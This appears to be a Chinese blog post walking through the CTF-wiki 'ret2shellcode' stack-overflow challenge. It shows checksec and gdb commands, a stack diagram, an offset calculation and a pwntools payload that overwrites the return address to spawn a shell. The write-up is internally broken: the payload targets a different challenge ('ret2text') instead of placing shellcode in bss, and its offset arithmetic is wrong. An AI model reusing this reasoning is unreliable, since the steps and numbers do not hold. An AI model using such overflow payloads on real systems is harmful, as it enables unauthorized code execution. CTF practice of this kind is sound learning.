码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 跟着CTF-wiki学pwn——ret2shellcode


    链接: 配置工具,gdb,ida

    ret2shellcode题解

    checksec查看:

    no canary=可以简单栈溢出
    在这里插入图片描述

    NX disabled = 将shellcode放在数据段,即可执行

    ida查看:
    在这里插入图片描述

    可以输入100个字节,复制到buf2,不能够溢出
    在这里插入图片描述

    原来buf2在bss段,

    bss段:一般指程序中未初始化的或者初始化为0的全局变量和静态变量的一块内存区域,特点是可读写,在程序执行之前,bss段清0

    是不是可以执行呢

    gdb调试:

    gdb ret2shellcode
    disas main
    b main
    r
    vmmap
    
    • 1
    • 2
    • 3
    • 4
    • 5

    在这里插入图片描述

    可以看到0804A080这个地址在上面选中的这个区域内,显示rwxp即可读写的权限。
    在这里插入图片描述

    lea eax,[esp+0x1c]  
    mov DWORD PTR [esp], eax 
    # 可以知道字符串起始地址相较于esp为+0x1c
    
    • 1
    • 2
    • 3

    所以距离ebp地址为0x88-0x1c = 0x6B

    那么覆盖到返回地址就是:

                                 +-----------------+
                                 |     /bin/sh     |  原ret返回位置
                                 +-----------------+
                                 |      holk       |  原saved ebp位置(4字节)
                          ebp--->+-----------------+
                                 |                 |
                                 |                 |
                                 |                 |
                                 |                 |
                                 |                 |
                                 |                 |
                 s起始,ebp-0x6B-->+-----------------+
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12

    0x6B+4 = 112(十进制)个字节。

    知道了溢出字符数了,接下来找system(/bin/sh)
    在这里插入图片描述

    栈溢出题目,有了溢出字符量,有了system(/bin/sh) 即为完成题目

    构造payload

    from pwn import * 
    sh = process('./ret2text')
    shell = 0x0804863A
    payload = 'a'*112 + p32(shell) #112个字节填满栈空间至ret+shell_add
    sh.sendline(payload)
    sh.interactive()
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
  • 相关阅读:
    acwing算法提高之图论--有向图的强连通分量
    电脑屏幕花屏怎么办?5个方法解决问题!
    web自动化测试详细流程和步骤
    单目标追踪——【评测工具】Ubuntu20.04的Python版本的VOT评测工具
    【Qt之QMapIterator】检测是否为空
    javascript原生态xhr上传多个图片,可预览和修改上传图片为固定尺寸比例,防恶意代码,加后端php处理图片
    在MySQL中使用VARCHAR字段进行日期筛选
    [Spring] Spring5——IOC 简介(二)
    【重识云原生】第四章云网络4.7.4节vhost-user方案——virtio的DPDK卸载方案
    XSS攻击笔记(上)
  • 原文地址:https://blog.csdn.net/qq_42882717/article/details/125551868
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号